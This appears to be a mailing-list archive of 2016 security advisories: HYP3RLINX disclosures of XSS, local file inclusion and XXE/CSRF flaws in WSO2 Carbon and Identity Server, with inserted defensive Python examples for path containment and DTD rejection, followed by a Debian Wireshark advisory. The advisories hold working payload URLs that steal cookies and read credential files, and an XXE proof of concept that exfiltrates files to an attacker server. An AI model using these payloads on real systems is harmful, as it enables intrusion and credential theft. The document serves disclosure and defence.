setName=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E==City+where+you+were+born+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=City+where+you+were+born+%3F=Father%27s+middle+name+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Father%27s+middle+name+%3F=Name+of+your+first+pet+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Name+of+your+first+pet+%3F=Favorite+sport+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Favorite+sport+%3F=Favorite+food+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Favorite+food+%3F=Favorite+vacation+location+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion1=Favorite+vacation+location+%3F=Model+of+your+first+car+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Model+of+your+first+car+%3F=Name+of+the+hospital+where+you+were+born+%3F=http%3A%2F%2Fwso2.org%2Fclaims%2FchallengeQuestion2=Name+of+the+hospital+where+you+were+born+%3F=%22%2F%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E=XSS


Then the XSS payload will be listed at the URL below:

https://victim-server:9443/carbon/identity-mgt/challenges-set-mgt.jsp?region=region1=identity_security_questions_menu

Finally, when the victim clicks the "Delete" entry on the page, the XSS is executed.

Here is the stored payload from the HTML source:

Delete


///


Reflected XSS 

XSS #1 
https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war=all=victim-server=9763=victim-server=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E


XSS #2 
https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?dsName=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29=HELL


XSS #3
https://victim-server:9443/carbon/ndatasource/newdatasource.jsp?description=%22onMouseMove=%22alert%28%27XSS%20by%20hyp3rlinx%20\n\n%27%2bdocument.cookie%29=true


XSS #4
https://victim-server:9443/carbon/webapp-list/webapp_info.jsp?webappFileName=odata.war=all=victim-server=%22/%3E%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%20\n\n%27%20%2bdocument.cookie%29%3C/script%3E=victim-server=

XSS #5
https://victim-server:9443/carbon/viewflows/handlers.jsp?retainlastbc=true=in=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E


XSS #6
https://victim-server:9443/carbon/ndatasource/validateconnection-ajaxprocessor.jsp?=WSO2_CARBON_DB=com.mysql.jdbc.Driver=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E=root=RDBMS=RDBMS=default=undefined=undefined=undefined=false=true=



Disclosure Timeline:
===
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:
===
Medium




WSO2-CARBON v4.4.5 LOCAL FILE INCLUSION

2016-08-15 Thread apparitionsec
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WSO2-CARBON-v4.4.5-LOCAL-FILE-INCLUSION.txt

[+] ISR: ApparitionSec


Vendor:
===
www.wso2.com



Product:

WSO2 Carbon v4.4.5

WSO2 Carbon is the core platform on which WSO2 middleware products are built. 
It is based on Java OSGi technology, which allows
components to be dynamically installed, started, stopped, updated, and 
uninstalled, and it eliminates component version conflicts.
In Carbon, this capability translates into a solid core of common middleware 
enterprise components, including clustering, security,
logging, and monitoring, plus the ability to add components for specific 
features needed to solve a specific enterprise scenario.



Vulnerability Type:
=
Local File Inclusion (LFI)



CVE Reference:
==
CVE-2016-4314



Vulnerability Details:
=

An authenticated user can download configuration files in the filesystem via 
the downloadArchivedLogFiles operation in the LogViewer admin service.
The request to the admin service accepts a file path relative to the Carbon log 
file directory (i.e. /repository/logs) and hence can access any file in the 
file system.


References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0098


Example: accessing the registry.xml file via Local File Inclusion exposes the 
MySQL passwords.

mysql-db

jdbc:mysql://localhost:3306/regdb
regadmin
regadmin
com.mysql.jdbc.Driver
80
6000
5




Exploit code(s):
===

LFI to read Database creds, truststore key file, web.xml etc...

1) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/registry.xml==

2) Read MySQL creds
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/datasources/master-datasources.xml

3) Access Truststore Key file.
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/resources/security/client-truststore.jks
 

4) Read web.xml
https://localhost:9443/carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/tomcat/carbon/WEB-INF/web.xml



Disclosure Timeline:
===
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
August 12, 2016  : Public Disclosure



Exploitation Technique:
===
Local



Severity Level:
===
High




HYP3RLINX
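A defender-side illustration of the LogViewer issue in the advisory above, added here and not part of the advisory or of WSO2's code: a path-containment check of the kind that closes this class of local file inclusion, together with a detector run over access-log lines shaped like the PoC URLs in the exploit section. The base directory, the log lines and all function names are assumptions made for the example.

```python
# Added example (not WSO2 code): confine a user-supplied log file name to the
# intended log directory, and flag traversal attempts in web-server access
# logs. Paths, log lines and names below are constructed for illustration.
import os
import re
from urllib.parse import parse_qs, unquote, urlparse


class PathEscapeError(ValueError):
    """Raised when a requested path resolves outside the allowed base."""


def resolve_log_path(base_dir: str, requested: str) -> str:
    """Return the absolute path for `requested` inside `base_dir`, or raise.

    The logFile parameter is only ever meant to name a file inside
    repository/logs, so anything that normalises to a location outside
    that directory (or to the directory itself) is rejected.
    """
    base = os.path.realpath(base_dir)
    if not requested or os.path.isabs(requested) or requested.startswith("\\"):
        raise PathEscapeError(f"not a plain log file name: {requested!r}")
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath() handles the ".." case after symlink resolution; a plain
    # string-prefix check would let "/repository/logs-evil" pass for base
    # "/repository/logs".
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise PathEscapeError(f"path escapes log directory: {requested!r}")
    return candidate


def is_contained(base_dir: str, requested: str) -> bool:
    """Boolean wrapper around resolve_log_path() for policy checks."""
    try:
        resolve_log_path(base_dir, requested)
        return True
    except PathEscapeError:
        return False


# A ".." path segment anywhere in the decoded value: "../", "..\", "/..", "..".
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Locations the PoC URLs reach for; a log viewer should never serve these.
SENSITIVE_PATHS = ("repository/conf", "resources/security", "WEB-INF")
# Request field of a combined-format access log line: "GET /path?query HTTP/1.1"
REQUEST_FIELD = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def flag_log_view_requests(access_log_lines):
    """Return [(line_no, decoded logFile value)] for /carbon/log-view/ requests
    whose logFile parameter traverses upward or names a sensitive path."""
    hits = []
    for line_no, line in enumerate(access_log_lines, 1):
        match = REQUEST_FIELD.search(line)
        if not match:
            continue
        url = urlparse(match.group(1))
        if not url.path.startswith("/carbon/log-view/"):
            continue
        for value in parse_qs(url.query).get("logFile", []):
            decoded = unquote(value)  # parse_qs decoded once; this catches %252F
            if TRAVERSAL.search(decoded) or any(p in decoded for p in SENSITIVE_PATHS):
                hits.append((line_no, decoded))
    return hits


# Constructed access-log lines; lines 2 and 3 mirror the PoC URLs above
# (line 3 is double URL-encoded, a common evasion of naive filters).
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [12/Aug/2016:10:01:02 +0000] "GET /carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=wso2carbon.log HTTP/1.1" 200 5120',
    '10.0.0.9 - - [12/Aug/2016:10:01:07 +0000] "GET /carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=../../repository/conf/registry.xml HTTP/1.1" 200 2311',
    '10.0.0.9 - - [12/Aug/2016:10:01:09 +0000] "GET /carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=..%252F..%252Frepository/conf/datasources/master-datasources.xml HTTP/1.1" 200 4098',
    '10.0.0.7 - - [12/Aug/2016:10:02:00 +0000] "GET /carbon/admin/login.jsp HTTP/1.1" 200 900',
    '10.0.0.5 - - [12/Aug/2016:10:02:30 +0000] "GET /carbon/log-view/downloadgz-ajaxprocessor.jsp?logFile=archive/wso2carbon.log.1 HTTP/1.1" 200 7001',
]

if __name__ == "__main__":
    for line_no, value in flag_log_view_requests(SAMPLE_ACCESS_LOG):
        print(f"line {line_no}: suspicious logFile={value!r}")
```

The containment check rejects on the resolved path rather than on the raw string, so encoded or platform-specific separators cannot bypass it; the detector decodes twice for the same reason. Both are assumptions about how a hardened LogViewer and its monitoring would behave, not a description of WSO2's actual fix.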


WSO2 IDENTITY-SERVER v5.1.0 XML External-Entity

2016-08-15 Thread hyp3rlinx
[+] Credits: John Page aka HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WSO2-IDENTITY-SERVER-v5.1.0-XML-External-Entity.txt

[+] ISR: ApparitionSec


Vendor:
=======
www.wso2.com



Product:
========
Wso2 Identity Server v5.1.0

As the industry’s first enterprise identity bus (EIB), WSO2 Identity Server is
the central backbone that connects and manages multiple identities across
applications, APIs, the cloud, mobile, and Internet of Things devices,
regardless of the standards on which they are based. The multi-tenant WSO2
Identity Server can be deployed directly on servers or in the cloud, and has
the ability to propagate identities across geographical and enterprise borders
in a connected business environment.



Vulnerability Type:
===================
XML External Entity / CSRF


CVE Reference(s):
=================
CVE-2016-4312 (XXE)
CVE-2016-4311 (CSRF)


Vulnerability Details:
======================


The WSO2IS XML parser is vulnerable to an XXE attack in the XACML flow. This can
be exploited when XML input containing a reference to an external entity is
processed by a weakly configured XML parser. The attack leads to the disclosure
and exfiltration of confidential data and arbitrary system files, denial of
service, server side request forgery, port scanning from the perspective of the
machine where the parser is located (localhost), and other system impacts.

The exploit can be carried out locally by an internal malicious user, or
remotely via CSRF if an authenticated user clicks an attacker-supplied link or
visits an evil webpage. In the case of WSO2IS, system files can be read /
exfiltrated to the remote attacker's server for safe keeping -_-

References:
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2016-0096



Exploit code(s):
================

XXE POC: exfiltrate the victim's Windows hosts file to our remote server.

1) Form for the XXE POST request.

https://victim-server:9443/carbon/entitlement/eval-policy-submit.jsp?withPDP=false;
 method="post"> 



http://attackserver:8080/payload.dtd;>
%dtd;]>







document.getElementById('XXE').submit()



2) DTD file on attacker server.


http://attackserver:8080?%file;'>">
%all;


3) On the attack server, create a listener for the victim's HTTP request.

python -m SimpleHTTPServer 8080




Disclosure Timeline:
====================
Vendor Notification: May 6, 2016
Vendor Acknowledgement: May 6, 2016
Vendor Fix / Customer Alerts: June 30, 2016
Public Disclosure: August 12, 2016



Exploitation Technique:
=======================
Remote



Severity Level:
===============
High




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. Permission is hereby
granted for the redistribution of this advisory, provided that it is not
altered except by reformatting it, and that due credit is given. Permission is
explicitly given for insertion in vulnerability databases and similar, provided
that due credit is given to the author. The author is not responsible for any
misuse of the information contained herein and accepts no responsibility for
any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security-related information or exploits by the
author or elsewhere.

HYP3RLINX
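The parser configuration that blocks the XACML XXE described in the advisory above, shown as an added example that is not code from the advisory or from WSO2 (whose product is Java; this demonstrates the same principle with Python's standard-library expat binding): refuse any DOCTYPE at its first byte and never resolve external or parameter entities, so a `%dtd;` reference to a remote DTD can never be fetched. The XACML request, the DOCTYPE samples and the function names are constructed for the example; the attacker host is a placeholder in the reserved `.invalid` domain and is never contacted.

```python
# Added example (not WSO2 code): a DTD-refusing XML front-end built on the
# standard library's expat binding. It rejects the document at the first byte
# of a DOCTYPE and never resolves external or parameter entities. Samples are
# constructed; the attacker host is a placeholder that is never contacted.
import xml.parsers.expat as expat


class DtdNotAllowed(ValueError):
    """Raised when the document carries a DOCTYPE (and thus any entities)."""


def parse_element_names(xml_text: str):
    """Parse `xml_text` and return the element names in document order,
    raising DtdNotAllowed before any entity could be declared or resolved."""
    parser = expat.ParserCreate()
    names = []

    def on_doctype(doctype_name, system_id, public_id, has_internal_subset):
        # Fires before the internal or external subset is parsed. A XACML
        # request never needs a DTD, so refuse outright instead of trying
        # to sanitise individual entity declarations.
        raise DtdNotAllowed(f"DOCTYPE {doctype_name!r} rejected")

    def on_external_entity(context, base, system_id, public_id):
        # Defence in depth: returning 0 makes expat abort with an error
        # instead of the application ever opening system_id.
        return 0

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    # Never expand parameter entities (the "%dtd;" trick) from any subset.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(xml_text, True)
    return names


def classify(xml_text: str) -> str:
    """'ok' if the document parses under the hardened settings, 'dtd-rejected'
    if it carried a DOCTYPE, 'malformed' for any other parse failure."""
    try:
        parse_element_names(xml_text)
    except DtdNotAllowed:
        return "dtd-rejected"
    except expat.ExpatError:
        return "malformed"
    return "ok"


# Constructed XACML 3.0 request of the shape an evaluation endpoint consumes.
BENIGN_REQUEST = (
    '<Request xmlns="urn:oasis:names:tc:xacml:3.0:core:schema:wd-17">'
    '<Attributes Category="urn:oasis:names:tc:xacml:1.0:subject-category:access-subject">'
    '<Attribute AttributeId="urn:oasis:names:tc:xacml:1.0:subject:subject-id">'
    '<AttributeValue DataType="http://www.w3.org/2001/XMLSchema#string">alice</AttributeValue>'
    '</Attribute></Attributes></Request>'
)

# Constructed: the same request prefixed with a DOCTYPE that pulls in an
# external parameter entity, the pattern the PoC relies on. The host is a
# placeholder in the reserved .invalid TLD, so nothing is ever contacted.
REQUEST_WITH_DTD = (
    '<!DOCTYPE Request [<!ENTITY % dtd SYSTEM "http://attacker.invalid/payload.dtd"> %dtd;]>'
    + BENIGN_REQUEST
)

# Constructed: a purely internal entity (no network) is refused as well,
# because the decision is made on the DOCTYPE itself, not on its contents.
REQUEST_WITH_INTERNAL_ENTITY = (
    '<!DOCTYPE Request [<!ENTITY greet "hello">]><Request>&greet;</Request>'
)

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN_REQUEST), ("external dtd", REQUEST_WITH_DTD),
                       ("internal entity", REQUEST_WITH_INTERNAL_ENTITY)]:
        print(f"{label}: {classify(doc)}")
```

Rejecting the DOCTYPE as a whole is the simplest robust policy for an endpoint that only ever expects schema-defined XACML: it needs no allow-list of entity names and removes the SSRF, file-read and entity-expansion cases in one step. The two extra settings are there so that a parser shared with other code paths, where a DOCTYPE might be tolerated, still never touches the network or the filesystem.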


[SECURITY] [DSA 3648-1] wireshark security update

2016-08-15 Thread Moritz Muehlenhoff
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-3648-1                   secur...@debian.org
https://www.debian.org/security/                       Moritz Muehlenhoff
August 12, 2016                       https://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package: wireshark
CVE ID : CVE-2016-6504 CVE-2016-6505 CVE-2016-6506 CVE-2016-6507 
 CVE-2016-6508 CVE-2016-6509 CVE-2016-6510 CVE-2016-6511

Multiple vulnerabilities were discovered in the dissectors for NDS,
PacketBB, WSP, MMSE, RLC, LDSS, RLC and OpenFlow, which could result in
denial of service or the execution of arbitrary code.

For the stable distribution (jessie), these problems have been fixed in
version 1.12.1+g01b65bf-4+deb8u8.

For the testing distribution (stretch), these problems have been fixed
in version 2.0.5+ga3be9c6-1.

For the unstable distribution (sid), these problems have been fixed in
version 2.0.5+ga3be9c6-1.

We recommend that you upgrade your wireshark packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBAgAGBQJXriWXAAoJEBDCk7bDfE42vn0QAKQSyQoWuCxhCJuS4iASaeef
OCT1ai3/s8LG4yEZBKC6oSbsgKU7uqJO3cmb7U5x3BDmcdow3h7PYeTBlHf5rvpK
d0/HIN1Q/NMrkf1BQKJckqgNhDMzrgHonpyhi/Yidjgu+/CrUgMYeZhm563cn3Ni
yUvNdKQZ42yowEd6uhVNUifn4Pg1/h+x6LuPjvtiggcbEGLHnXzdmtoqwh27AhP0
Up3e+QO8N7P9/mCnB27Sm5whQXlNYem/zsIMsk0KVzXsEz7cBOm+GtrI4VsSlAc3
RtGSTkdAwAGi5i1l7fk3RAvOpLDy2KfgxxBR3fTv9KHgEu1EPpoFPIUdLgoEESlT
bs2B+zmNmOfktPjfh7r5JCeaWa+A0l07tP6CyYDqq4xP4IhiqShuGXz+/twoYMlg
NucTs04UlZVW3cayjGtiGc+8mnkdBohclrkaQjwyhv8ltnxGHfHoZHGNF7smOiVV
n3Qnzsg3iFsM4Pr5YPqUzWUmh7PMulOCY68KVgIOi/RoFKyActyNX3yG5bg8gdcJ
Bqi3J3UJWZ7fDxnuSX0vayuVq7O/2AxX+PiHsYfhi7XjWYz3R1sxny2TVZp4zKjF
YUKECkcL6cTbAt+keOaFl5gVAOElCPzBOgIJRVgx2TeJIkr3/baYrsfjnNFvNRNf
2UHuDtNdMlkdSfYKxlyD
=hOTx
-----END PGP SIGNATURE-----